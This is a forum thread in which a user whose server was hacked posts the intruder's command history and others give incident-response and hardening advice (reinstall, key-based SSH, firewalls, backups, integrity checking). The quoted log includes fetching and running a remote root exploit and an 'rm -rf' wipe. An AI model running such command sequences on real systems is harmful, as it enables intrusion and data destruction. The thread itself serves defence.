I've been hacked

[Mahyar]

Hi everyone,

My server has been hacked.

I noticed that I couldn't access its files remotely, so had a closer look. There were no files in my home folder.

I looked at the log of commands, and this is what I found.

sudo su
pwd
ls -a
w
id
uname -a
wget <some file>
unzip root.txt.zip
perl root.txt
ls
id
rm -rf*
exit -0

Does anyone have any advice? How did they get my password after inputting 'sudo su'? Should I reinstall the OS? Is there anything I can do to safeguard against this in the future? Is this a bot or human?

I know it's too late this time, but I don't want this to happen again, to me or anyone.

All comments appreciated.

Thanks

[hakermania]

I am very sorry that this happened to you. I hope you had everything backed up. This is the worst type of hackers: Logging in, deleting as many things as they can and then they log off. Probably without any good reason.

I guess that you took the commands from ~/.bash_history file? Weird that the hacker did not logged in twice to wipe out the file so as to hide the commands from you.
Please mention that for root the commands are saved under /root/.bash_history, so if the "sudo su" command was successful any commands run by the su session will be under /root/.bash_history

But, from my point of view, the first "sudo su" was unsuccessful (maybe the user he was logged in from could not become root using this way) so he downloaded an exploit using wget and tried to run it so as to gain root privileges. If he had been successful I think that he would wipe out the whole filesystem, not just the home folder of yours. That makes me believe that his try to gain root privileges was unsuccessful.

As to what gave him access to your server, who knows? There are way too many ways to attempt to access a server, from SQL injection, brute force attacks, XSS and the list goes on. I don't know many things about server configuration etc but I guess that there will be somewhere a log which may say something interesting.

[Mahyar]

Thanks for your advice. I think you're right.

I need to boost security.

[nerdtron]

Make the server offline immediately. If you have backup on your data, reinstall everything so that you can make the server online again with minimal downtime.
I always enable the firewall and only allow ssh by default on all server deployments. You can change the port of the ssh and disable root login and then use a secure password. It can be enough on a not so popular/not busy web server.

[ian-weisser]

Nerdtron is right:
- Take your server offline *immediately*
- Complete reinstall. You don't know what other surprises are lurking.
- Restore data from pre-hack backups. Do not try to preserve the data on your compromised system.

Use ssh keys instead of passwords on an internet-facing server.

See https://help.ubuntu.com/12.04/serverguide/security.html

[scbingham]

Also, don't use the ssh default external port 22 on your router for port forwarding, use something higher than 9000.

My server was continually bombarded with access attempts & I realised it was probably just a matter of time before someone got in.

Since I changed it to a port above 9000, all went quiet. I also installed denyhosts, there are other programs too.

[tripp98]

Also give them something to do. Install a honeypot and forward 22 to it. Its designed to capture what the hackers try to do.

[Gyokuro]

Nerdtron is right:
- Take your server offline *immediately*
- Complete reinstall. You don't know what other surprises are lurking.
- Restore data from backups. Do not try to preserve the data on your compromised system.

Use ssh keys instead of passwords on an internet-facing server.

See https://help.ubuntu.com/12.04/serverguide/security.html

First two points are ok but with the third one I have a problem: how does the OP knows that his/her backups are not altered and after a clean install those modifications get back on the system?? The best would be to make a copy of the hacked system which can be usefull for computer forensic and install a clean system in a controlled environment and after updates to use something like AIDE (http://www.securitytube.net/video/4963) and keep the log files at a place which are not reachable from the Internet (on usb stick in a safe). Maybe this is useful.

[ian-weisser]

how does the OP knows that his/her backups are not altered and after a clean install those modifications get back on the system??

Good point. Clarified above to restore data from pre-hack backups.

[unspawn]

There were no files in my home folder. (..) Should I reinstall the OS?

If there were no files left in your home directory but the rest of the files are there then their attempt to gain root may have not met with success.
This should not automagically mean you're safe: only the result from investigating the cause and assessing damages should count.
Let us know if you would like to do that.

Is there anything I can do to safeguard against this in the future?

To start with:
- Read your distributions documentation,
- Read your distributions security documentation,
- Install only the software you need -=[ now ]=-,
- Update software when updates are released,
- Disable services that are unused or easy to gain entry with,
- Restrict access to services wherever possible,
- Don't use simple passwords,
- Use pubkey auth only for SSH access,
- Enable proactive measures where possible,
- Ensure you regularly audit your machine.